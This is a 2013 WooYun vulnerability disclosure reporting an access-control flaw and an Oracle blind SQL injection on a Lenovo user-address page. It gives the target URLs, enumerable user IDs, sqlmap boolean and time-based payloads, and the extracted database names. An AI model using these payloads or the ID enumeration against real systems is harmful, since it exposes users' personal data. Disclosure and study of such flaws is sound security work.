当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-035384

漏洞标题:联想安全问题十二从越权到SQL注射(数千万联想用户信息可被泄露)

相关厂商:联想

漏洞作者: VIP

提交时间:2013-08-27 15:15

修复时间:2013-10-11 15:16

公开时间:2013-10-11 15:16

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-08-27: 细节已通知厂商并且等待厂商处理中
2013-08-29: 厂商已经确认,细节仅向厂商公开
2013-09-08: 细节向核心白帽子及相关领域专家公开
2013-09-18: 细节向普通白帽子公开
2013-09-28: 细节向实习白帽子公开
2013-10-11: 细节向公众公开

简要描述:

漏洞好多

详细说明:

首先是个越权(其实这个越权的价值比注射还要大,因为是盲注)
http://spm3.lenovo.com.cn/sv/bs_user/bs_user_addrdisplay.aspx?user_id=34959270
把id改改就能看别人的地址什么的了
比如:
http://spm3.lenovo.com.cn/sv/bs_user/bs_user_addrdisplay.aspx?user_id=34959267
http://spm3.lenovo.com.cn/sv/bs_user/bs_user_addrdisplay.aspx?user_id=34959266
等等等等
同样,这个地方也可以注射

漏洞证明:

越权的证明上面已经写了

---
Place: GET
Parameter: user_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: user_id=34959270' AND 2767=2767 AND 'iHtc'='iHtc
Type: AND/OR time-based blind
Title: Oracle AND time-based blind (heavy query)
Payload: user_id=34959270' AND 2656=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_U
SERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND 'ADwq'='ADwq
---


web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 4.0.30128
back-end DBMS: Oracle


current user:    'SDM_SPM'


current schema (equivalent to database on Oracle):    'SDM_SPM'


数据库

available databases [16]:
[*] ADM
[*] ANALYSIS
[*] BAS
[*] CC
[*] CTXSYS
[*] EXFSYS
[*] LIDANE
[*] MDSYS
[*] OLAPSYS
[*] PART
[*] SDM_SPM
[*] SPM
[*] SYS
[*] SYSTEM
[*] WMSYS
[*] XIAOTG


修复方案:

过滤吧 还有 把越权补一下

版权声明:转载请注明来源 VIP@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2013-08-29 23:24

厂商回复:

感谢您对联想安全做出的贡献!我们将立即评估与修复相关漏洞

最新状态:

暂无


漏洞评价:

评论

  1. 2013-08-27 15:15 | 78基佬 ( 实习白帽子 | Rank:84 漏洞数:20 | 不会日站的设计师不是好产品经理)

    数千万

  2. 2013-08-27 15:18 | 小胖子 认证白帽子 ( 核心白帽子 | Rank:1727 漏洞数:140 | 如果大海能够带走我的矮丑...)

    漏洞状态: 漏洞没有通过审核 具体原因: 漏洞与平台现有记录重复,相关信息ID 其他说明: http://wooyun.org/bugs/wooyun-2013-035384 我能砍死你吗?不发了,联想也不发礼物,都留着自己玩儿。TNND

  3. 2013-08-27 15:20 | VIP ( 普通白帽子 | Rank:759 漏洞数:100 )

    @小胖子 哈哈不能

  4. 2013-08-27 16:05 | 淡漠天空 认证白帽子 ( 实习白帽子 | Rank:1113 漏洞数:142 | M:出售GOV STATE NSA CIA NASA DHS Symant...)

    @小胖子 看了洞主列表 很自觉的没有交sql注入 估计交了全部重复打回 哈哈

  5. 2013-08-29 08:03 | 小沛 ( 路人 | Rank:11 漏洞数:3 | 大数据时代来领,求租大数据 531827272#qq.c...)

    @VIP 漏洞都被洞主挖完了

  6. 2013-08-29 15:41 | 淡漠天空 认证白帽子 ( 实习白帽子 | Rank:1113 漏洞数:142 | M:出售GOV STATE NSA CIA NASA DHS Symant...)

    @小沛 我会告诉你还有远程代码执行 xss Sybase注入么 冏 只是看楼主这精神 。。。。我们默默地把

  7. 2013-08-30 11:37 | 小沛 ( 路人 | Rank:11 漏洞数:3 | 大数据时代来领,求租大数据 531827272#qq.c...)

    @淡漠天空 求带挖洞